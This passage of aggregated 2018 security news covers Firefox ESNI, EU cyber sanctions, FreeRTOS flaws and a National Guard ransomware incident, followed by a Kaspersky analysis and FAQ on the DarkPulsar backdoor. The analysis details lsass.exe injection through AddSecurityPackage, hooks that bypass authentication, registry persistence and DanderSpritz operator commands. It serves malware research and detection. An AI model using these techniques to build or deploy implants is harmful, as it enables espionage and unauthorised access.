“Big Content Distribution Networks (CDNs) host a lot of sites all on the same machines. If they’re willing to convert all their customers to ESNI at once, then suddenly ESNI no longer reveals a useful signal because the attacker can see what CDN you are going to anyway,” he explains.

With the added support for ESNI, Firefox becomes the first browser to adopt the technology. Users looking to take advantage of it should grab the latest Firefox Nightly build, make sure they have DNS over HTTPS enabled, and set the “network.security.esni.enabled” preference in about:config to “true”.

“This should automatically enable ESNI for any site that supports it. Right now, that’s just Cloudflare, which has enabled ESNI for all its customers, but we’re hoping that other providers will follow them,” Rescorla notes.

EU Leaders Vow Tough Action on Cyber Attacks
21.10.2018 securityweek 

EU leaders on Thursday condemned the attempted hack on the global chemical weapons watchdog and vowed to step up the bloc's efforts to tackle cyber attacks.

With concerns growing about the malign cyber activities of several countries around the world, notably Russia, the bloc's leaders called for work to begin to set up sanctions to punish hackers.

The decision at an EU summit in Brussels comes after eight countries led by Britain pushed for urgent moves to hit hackers, warning that a lack of action was giving the impression that cyber attacks would go unpunished.

"Work on the capacity to respond to and deter cyber attacks through EU restrictive measures should be taken forward," the 28 leaders said in their summit communique.

The statement condemned the bid, revealed this month, by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

"Such threats and attacks strengthen our common resolve to further enhance the EU's internal security and our ability and capabilities to detect, prevent, disrupt and respond to hostile activities of foreign intelligence networks," the summit statement said.

A proposal backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands earlier this week called for a sanctions regime to be set up to punish cyber attackers.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But efforts to crack down on cyber attackers may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.

FreeRTOS Vulnerabilities Expose Many Systems to Attacks
21.10.2018 securityweek

Vulnerabilities discovered in the FreeRTOS operating system can expose a wide range of systems to attacks, including smart home devices and critical infrastructure, researchers warn.

FreeRTOS is an open source operating system designed specifically for microcontrollers. The OS has many use cases, including industrial applications (sensors, actuators, pumps), B2B solutions (security equipment, door locks), and consumer products (home appliances, wearable technology). Amazon, which took over the FreeRTOS project in 2017, has added cloud connectivity capabilities.freeRTOS vulnerabilities found

The commercial version of the operating system is called OpenRTOS and it’s maintained by WITTENSTEIN high integrity systems (WHIS), which also develops the safety-focused version SafeRTOS.

Researchers from Zimperium’s zLabs have analyzed FreeRTOS’s TCP/IP stack and AWS secure connectivity modules, and discovered more than a dozen vulnerabilities that also impact OpenRTOS and SafeRTOS.

Both Amazon and WHIS have developed patches for the flaws discovered by zLabs. Amazon addressed the issues with the release of FreeRTOS 1.3.2.

Since it’s an open source project, the mobile cybersecurity firm has decided not to disclose any vulnerability details for another 30 days to allow vendors to deploy the patches.

The company did, however, share some limited information about each of the flaws it discovered. The list includes four remote code execution, one denial-of-service (DoS), and seven information leakage issues.

“These vulnerabilities allow an attacker to crash the device, leak information from the device’s memory, and remotely execute code on it, thus completely compromising it,” zLabs said in a blog post.

Since FreeRTOS is used by a wide range of systems, the vulnerabilities found by Zimperium researchers can be highly useful to malicious actors, including cybercriminals trying to build botnets powered by home device, and sophisticated threat actors looking to target critical infrastructure.

Server With National Guard Personnel Data Target of Attack
21.10.2018 securityweek 

The Indiana National Guard says a state, non-military computer server containing personal information on civilian and military Guard personnel was the target of a recent ransomware attack.

The Guard said Thursday it is notifying the affected personnel that they should be alert for suspicious activity or fraudulent accounts being opened in their name.

It says the type of ransomware attack targets the server by denying access to the rightful owners but usually does not compromise the contents of the server. It says it has no reason to believe it was a targeted attack against the Indiana National Guard.

The Guard says it's taking steps to prevent future such attacks.

20.10.2018 Kaspersky

In March 2017, the ShadowBrokers published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch.

DanderSpritz consists entirely of plugins to gather intelligence, use exploits and examine already controlled machines. It is written in Java and provides a graphical windows interface similar to botnets administrative panels as well as a Metasploit-like console interface. It also includes its own backdoors and plugins for not-FuzzBunch-controlled victims.

DanderSprit interface

Fuzzbunch on the other hand provides a framework for different utilities to interact and work together. It contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. There are three files in the plugin set from the FuzzBunch framework:

This is the utility file of the framework. It duplicates the header from XML and includes the plugin’s ID.

This executable file is launched when FuZZbuNch receives the command to do so.

This configuration file describes the plugin’s input and output parameters – the parameter name, its type and description of what it’s responsible for; all of these can be shown in FuzzBunch as a prompt. This file also contributes a lot to the framework’s usability, as it supports the specification of default parameters.

One of the most interesting Fuzzbunch’s categories is called ImplantConfig and includes plugins designed to control the infected machines via an implant at the post-exploitation stage. DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ‘sipauth32.tsp’ that provides remote control, belonging to this category.

It supports the following commands:

Burn, RawShellcode, UpgradeImplant, and PingPong remove the implant, run arbitrary code, upgrade the implant and check if the backdoor is installed on a remote machine, respectively. The purpose of the other commands is not that obvious and, to make it worse, the leaked framework contained only the administrative module to work with DarkPulsar’s backdoor, but not the backdoor itself.

While analyzing the administrative module, we noticed several constants that are used to encrypt the traffic between the C&C and the implant:

We thought that probably these constants should also appear in the backdoor, so we created a detection for them. Several months later we found our mysterious DarkPulsar backdoor. We later were able to find both 32- and 64-bit versions.

We found around 50 victims located in Russia, Iran and Egypt, typically infecting Windows 2003/2008 Server. Targets were related to nuclear energy, telecommunications, IT, aerospace and R&D.

DarkPulsar technical highlights
The DarkPulsar implant is a dynamic library whose payload is implemented in exported functions. These functions can be grouped as follows:

Two nameless functions used to install the backdoor in the system.
Functions with names related to TSPI (Telephony Service Provider Interface) operations that ensure the backdoor is in the autorun list and launched automatically.
A function with a name related to SSPI (Security Support Provider Interface) operations. It implements the main malicious payload.
The implementations of the SSPI and TSPI interfaces are minimalistic: the functions that are exported by DarkPulsar have the same names as the interface functions; however, they include malicious code instead of the phone service.

The implant is installed in the system by the nameless exported function. The backdoor is launched by calling Secur32.AddSecurityPackage with administrator privileges with the path to its own library in the parameter, causing lsass.exe to load DarkPulsar as SSP/AP and to call its exported function SpLsaModeInitialize used by DarkPulsar to initialize the backdoor. In this way AddSecurityPackage is used to inject code into lsass.exe. It also adds its library name at HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers

This is loaded at start by the Telephony API (TapiSrv) launched alongside the Remote Access Connection Manager (RasMan) service, setting startup type as “Automatic”. When loading the telephony service provider’s library, TapiSrv calls TSPI_lineNegotiateTSPIVersion which contains the AddSecurityPackage call to make the inject into lsass.exe.

DarkPulsar implements its payload by installing hooks for the SpAcceptLsaModeContext – function responsible for authentication. Such injects are made in several system authentication packets within the process lsass.exe and allow Darkpulsar to control authentication process based on the following protocols:

Msv1_0.dll – for the NTLM protocol,
Kerberos.dll – for the Kerberos protocol,
Schannel.dll – for the TLS/SSL protocols,
Wdigest.dll – for the Digest protocol, and
Lsasrv.dll –for the Negotiate protocol.
After this, Darkpulsar gets ability to embed malware traffic into system protocols. Since this network activity takes place according to standard system charts, it will only be reflected in the System process – it uses the system ports reserved for the above protocols without hindering their normal operation.

Network traffic during successful connection to DarkPulsar implant

The second advantage of controlling authentication processes is ability to bypass entering a valid username and password for obtaining access to objects that require authentication such as processes list, remote registry, file system through SMB. After Darkpulsar’s DisableSecurity command is sent, backdoor’s hooks on the victim side will always returns in the SpAcceptLsaModeContext function that passed credentials are valid. Getting that, system will provide access to protected objects to client.

Working with DarkPulsar
Darkpulsar-1.1.0.exe is the administrative interface working under the principle of “one command – one launch”. The command to be executed must be specified either in the configuration file Darkpulsar- or as command line arguments, detailing at least:

whether the target machine uses a 32-bit or 64-bit system;
protocol (SMB, NBT, SSL, RDP protocols are supported) to deliver the command and port number
private RSA key to decrypt the session AES key
Darkpulsar-1.1.0 was not designed as a standalone program for managing infected machines. This utility is a plugin of the Fuzzbunch framework that can manage parameters and coordinate different components. Here is how DisableSecurity command in Fuzzbunch looks like:

Below is an example of Processlist after DisableSecurity, allowing to execute any plugin without valid credentials and operating via regular system functions (remote registry service):

DanderSpritz is the framework for controlling infected machines, different from FuZZbuNch as the latter provides a limited toolkit for the post-exploitation stage with specific functions such as DisableSecurity and EnableSecurity for DarkPulsar.

For DanderSpritz works for a larger range of backdoors, using PeedleCheap in the victim to enable operators launching plugins. PeddleCheap is a plugin of DanderSpritz which can be used to configure implants and connect to infected machines. Once a connection is established all DanderSpritz post-exploitation features become available.

This is how DarkPulsar in EDFStagedUpload mode provides the opportunity to infect the victim with a more functional implant: PCDllLauncher (Fuzzbunch’s plugin) deploys the PeddleCheap implant on the victim side, and DanderSpritz provides a user-friendly post-exploitation interface. Hence, the full name of PCDllLauncher is ‘PeddleCheap DLL Launcher’.

The complete DanderSpritz usage scheme with the plugin PeddleCheap via FuZZbuNch with the plugins DarkPulsar and PCDllLauncher consists of four steps:

Via FuZZbuNch, run command EDFStagedUpload to launch DarkPulsar.
In DanderSpritz, run command pc_prep (PeedelCheap Preparation) to prepare the payload and the library to be launched on the implant side.
In DanderSpritz, run command pc_old (which is the alias of command pc_listen -reuse -nolisten -key Default) – this sets it to wait for a socket from Pcdlllauncher.
Launch Pcdlllauncher via FuZZbuNch and specify the path to the payload that has been prepared with the command pc_prep in the ImplantFilename parameter.


File System plugin

The FuzzBunch and DanderSpritz frameworks are designed to be flexible and to extend functionality and compatibility with other tools. Each of them consists of a set of plugins designed for different tasks: while FuzzBunch plugins are responsible for reconnaissance and attacking a victim, plugins in the DanderSpritz framework are developed for managing already infected victims.

The discovery of the DarkPulsar backdoor helped in understanding its role as a bridge between the two leaked frameworks, and how they are part of the same attacking platform designed for long-term compromise, based on DarkPulsar’s advanced abilities for persistence and stealthiness. The implementation of these capabilities, such as encapsulating its traffic into legitimate protocols and bypassing entering credentials to pass authentication, are highly professional.

Our product can completely remove the related to this attack malware.

Detecting malicious network activity
When EDFStagedUpload is executed in an infected machine, a permanent connection is established, which is why traffic via port 445 appears. A pair of bound sockets also appears in lsass.exe:

When DanderSpritz deploys PeddleCheap’s payload via the PcDllLauncher plugin, network activity increases dramatically:

When a connection to the infected machine is terminated, network activity ceases, and only traces of the two bound sockets in lsass.exe remain:

implant – 96f10cfa6ba24c9ecd08aa6d37993fe4
File path – %SystemRoot%\System32\sipauth32.tsp
Registry – HKLM\Software\Microsoft\Windows\CurrentVersion\Telephony\Providers

DarkPulsar FAQ
20.10.2018 Kaspersky 
What’s it all about?
In March 2017, a group of hackers calling themselves “the Shadow Brokers” published a chunk of stolen data that included two frameworks: DanderSpritz and FuzzBunch. The Fuzzbunch framework contains various types of plugins designed to analyze victims, exploit vulnerabilities, schedule tasks, etc. The DanderSpritz framework is designed to examine already controlled machines and gather intelligence. In pair, it is a very powerful platform for cyber-espionage.

How was this implant discovered?
We always analyze all leaks containing malicious software to provide the best detection. The same happened after the “Lost in Translation” leak was revealed. We noticed that this leak contained a tool in the “implants” category called DarkPulsar. We analyzed this tool and understood that it is not a backdoor itself, but the administrative part only. We also noticed some magic constants in this administrative module, and having created some special signatures based on them, were able to catch the implant itself.

What exactly can this implant be used for?
This implant supports 7 commands:

The most interesting are DisableSecurity and EnableSecurity.

Burn – for self-deletion.
RawShellcode – to execute arbitrary base-independent code.
EDFStageUpload – Exploit Development Framework Stage Upload. Step by step it deploys DanderSpritz payloads to the victim’s memory without touching the drive. After this command is executed, the administrator can send to the victim any of the multiple DanderSpritz commands. (View details in the technical part of this report)
DisableSecurity – for disabling NTLM protocol security. With help of this command, the malware administrator does not need to know a valid victim username and password to successfully pass authentication – the system will interpret any arbitrary pair as valid. (View details in the technical part of this report)
EnableSecurite – the opposite of DisableSecurity.
UpgradeImplant – for installing a new version of the backdoor.
PingPong – for test communication.
How many victims?
We found around 50 victims, but believe that the figure was much higher when the Fuzzbunch and DanderSpritz frameworks were actively used. We think so because of the DanderSpritz interface, which allows many victims to be managed at the same time. The second point proving this suggestion is that after stopping their cyber-espionage campaign, the malware owners often delete their malware from victim computers, so the 50 victims are very probably just ones that the attackers have simply forgotten.

Which countries?
All victims were located in Russia, Iran, and Egypt, and typically Windows 2003/2008 Server was infected. Targets were related to nuclear energy, telecommunications, IT, aerospace, and R&D

What about the attack duration? Does it last long?
DarkPulsar’s creators did not skimp on resources in developing such an advanced mechanism of persistence. They also included functionality to disable NTLM protocol security for bypassing the need to enter a valid username and password during authentication. This indicates that victims infected with DarkPulsar were the targets of a long-term espionage attack.

Is the attack still active?
We think that after the “Lost In Translation” leakage the espionage campaign was stopped, but that doesn’t mean that all computers are rid of this backdoor infection. We cured all our users. As for users without our protection, we have several tips on how to check whether your system is infected and how to cure it by yourself. Note that to exploit this backdoor on infected victims, the attackers need to know the private